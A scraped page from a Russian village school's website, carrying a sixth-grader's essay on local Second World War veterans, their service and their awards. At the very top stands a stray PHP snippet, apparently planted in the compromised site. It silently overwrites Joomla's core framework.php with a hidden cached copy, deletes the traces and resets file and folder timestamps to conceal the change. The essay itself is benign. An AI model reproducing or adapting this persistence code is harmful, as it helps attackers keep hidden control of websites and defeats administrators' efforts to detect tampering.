$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } О ветеранах сагарчинцах...

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 295
Просмотры материалов : 211020

На сайте

Сейчас 66 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

О ветеранах сагарчинцах...

Сочинение ученицы 6 класса Борисовой Амины

«О ветеранах сагарчинцах…»

Приближается дата, которая золотыми буквами вписана в историю нашего Отечества: День Победы, 9 мая. В этом году исполняется 70  лет Победы нашего народа в Великой Отечественной войне 1941 – 1945 гг. с фашистской Германией. В этой самой кровопролитной войне в истории человечества, продолжавшейся 1418 дней, советский народ показал образцы мужества, героизма и самоотверженности. Практически нет такой семьи, которой не коснулась бы война…

Много воды унесла река времени с тех пор. Заросли шрамы окопов, исчезли пепелища сожженных городов, выросли новые поколения. Но тем не менее…

Никуда от Прошлого не деться,

Вновь Война стучится в души к нам.

Обжигает, обжигает сердце

Благодарность с болью пополам…

(Ю. Друнина «Неизвестный солдат»)

 Каждая семья, каждый уважающий себя, свою Родину человек снова и снова вспоминает, я думаю, те зловещие 1418 долгих дней и ночей Великой Отечественной, которые унесли с собой миллионы жизней советских людей.

Наверное, ученики Сагарчинской школы не единственные ученики школ оренбургского края, которые чтят память о тех зловещих днях. В нашей школе много собрано материала о наших односельчанах, которые приняли участие в этой зловещей войне. Вот и в этом году в школе появился большой баннер, на котором размещены фотографии участников Великой Отечественной войны.  Здесь много фотографий. Много разных судеб.

…Буйновский Андрей Савельевич. Родился в 1917 году. В армию был призван в 1934году. Прослужил в ней по 1937 год. Но в 1939 году ушёл на финскую войну и в 1940 году вернулся домой. А в 1941 году снова ушёл на войну, но теперь уже защищать свою Родину от немецких захватчиков. Был начальником направления связи. Служил в звании сержанта в 568 гвардейской дивизии. Освобождал Латвию, Эстонию, Польшу.  Принимал участие в боях за Ленинград. Мой односельчанин имеет много наград: «Орден Красной звезды», медали  «За оборону Ленинграда», «За отвагу», «За Победу».  А чуть выше на этом баннере расположена фотография ещё одного моего земляка – Лутай  Иван Яковлевич. Вот что известно нам об этом человеке. Родился он на Украине, в Днепропетровской области, в селе, в 1915 году, в семье крестьянина. В семье было четверо детей: Иван Яковлевич и ещё три сестры. Отец и мать Ивана Яковлевича занимались земледелием, садоводством. Имели небольшое хозяйство.  Во время переселения украинцев приехала  семья Лутай в Акбулакский район. Здесь Иван пошёл в школу. После окончания семилетки учился в Акбулакском педагогическом училище.  В 1935 году был призван в Красную Армию, где отслужил 5 лет. Осенью 1940 года демобилизовался, вернулся в Акбулакский район и стал работать в Карповской школе учителем. Но долго работать не пришлось, потому что пришёл грозовой 1941 год. В июне Иван Яковлевич ушёл на фронт. Воевал в Ленинграде, пережил блокаду. На фронте сначала был политруком, а затем лейтенантом артиллерийских войск. Был ранен. Закончил войну Иван Яковлевич в августе 1945 года. Имеет награды, среди них орден Боевой славы.

С гордостью могу сказать, что мои односельчане принимали участие во многих сражениях. Например, Буйновский Лаврентий Савельич, Добреля Данил Алексеевич защищали Сталинград и имеют  за это награду – медаль «За оборону Сталинграда». Данил Алексеевич дошёл до самого фашистского логова, за что Родина наградила его  медалью «За взятие Берлина». Куспаков Ахмет Киреевич оборонял Ленинград. Лубинец Иван Николаевич воевал под городом Львовом, Ужгородом. Награждён Иван Яковлевич орденом Отечественной войны II степени.  Не менее знаменит Марченков Михаил Фёдорович, который был на фронте с 1943 по 1945 годы. Демобилизовался в 1953 году, поскольку служил после войны в войсках НКВД в первом Белорусском фронте. Освобождал города Минск, Вильнюс, Пелау, Бергозовск, территорию Молдавии. Имеет награды: орден Отечественной войны  первой степени, орден Красной Звезды, медали «За отвагу», «За боевые заслуги».

А ещё на данной экспозиции можно увидеть фотографии братьев Гордиенко Василия Емельяновича и Петра Емельяновича. Василий Емельянович был  в армии с 1943 по 1949 годы.. Василий Емельянович служил на территории Австрии, Чехословакии. Имеет награды: орден Отечественной войны, медали «За боевые заслуги», «За взятие Вены».

Наверное, можно сказать, что, к сожалению, на данном баннере есть и фотографии женщин,  которые тоже  были на войне. Почему говорю «к сожалению», потому что, считаю, что война не женское дело. Не должна женщина заниматься таким жестоким действом. Но, я думаю, что мои односельчанки, наши прабабушки, поступили очень правильно, что в самую трудную минуту они были рядом с мужчинами и достойно вынесли все тяготы этого лихолетья.  Я с гордостью называю их имена: Жумагулова Сара Мустафиевна, Король Анна Никифоровна, Гладкова-Гук Евдокия Васильевна, Сатубалдина Бибиш  Реймовна, Дергачёва-Тренина Миланья Ивановна  - вот они героини моего села. Иначе их назвать нельзя.  Их нежные женские руки перевязывали раненых, стирали окровавленные бинты, прокладывали наравне с мужчинами телефонную связь. Они были молоды, но молодость, как известно не помеха храбрости и геройству.

         Рассказывать о героизме моих односельчан  можно долго. Лишь бы слушали…  Лишь бы помнили…  Ведь память - это свойство души хранить сознание о былом.

      Семьдесят лет отделяет нас от времён Великой Отечественной войны, от Победы. Всё меньше остаётся ветеранов, которые могут как очевидцы и участники рассказать о том, чем была война для нашей страны. Может быть, через много лет люди почти не будут вспоминать об этой войне. Как можно забыть ужас, который пережили наши близкие? Из фильмов, рассказов ветеранов я так представляю войну: зловещие языки пламени, рвущие всё на пути, искажённые ужасом лица женщин, прижимающих к себе перепуганных детей, стоны раненых, грохот орудий, свист пуль. Всюду трупы людей, недавно думавших о будущем, надеявшихся на встречу с родными. Всё это и есть война – самое страшное событие, которое только может случиться в истории человечества.

Борисова Амина.